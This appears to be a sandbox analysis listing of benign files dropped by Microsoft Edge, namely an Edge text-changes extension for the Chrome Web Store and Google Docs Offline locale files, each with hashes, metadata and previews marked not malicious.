SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir6592_1346790632\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir6592_1346790632\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir6592_1346790632\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\4233027f-f150-4259-8f19-b516f9ed5479.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	154477
Entropy (8bit):	7.835886983924039
Encrypted:	false
SSDEEP:	3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
MD5:	14937B985303ECCE4196154A24FC369A
SHA1:	ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
SHA-256:	71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
SHA-512:	1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...\|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.\|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,\|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
